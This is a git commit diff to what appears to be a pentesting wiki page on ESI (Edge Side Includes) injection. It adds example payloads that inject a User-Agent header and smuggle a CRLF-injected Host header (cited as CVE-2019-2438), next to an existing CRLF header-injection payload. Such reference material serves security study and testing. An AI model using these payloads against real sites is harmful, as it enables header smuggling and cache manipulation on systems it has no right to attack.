GitBook: [#3605] No subject
This commit is contained in:
parent
747c497387
commit
0c112f832b
|
@ -155,6 +155,25 @@ Do not confuse this with a "Local File Inclusion":
|
|||
<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
|
||||
```
|
||||
|
||||
#### Add Header
|
||||
|
||||
```html
|
||||
<esi:include src="http://example.com/asdasd">
|
||||
<esi:request_header name="User-Agent" value="12345"/>
|
||||
</esi:include>
|
||||
```
|
||||
|
||||
#### CRLF in Add header (**CVE-2019-2438)**
|
||||
|
||||
****
|
||||
|
||||
```markup
|
||||
<esi:include src="http://example.com/asdasd">
|
||||
<esi:request_header name="User-Agent" value="12345
|
||||
Host: anotherhost.com"/>
|
||||
</esi:include>
|
||||
```
|
||||
|
||||
#### Akamai debug
|
||||
|
||||
This will send debug information included in the response:
|
||||
|
|
Loading…
Reference in New Issue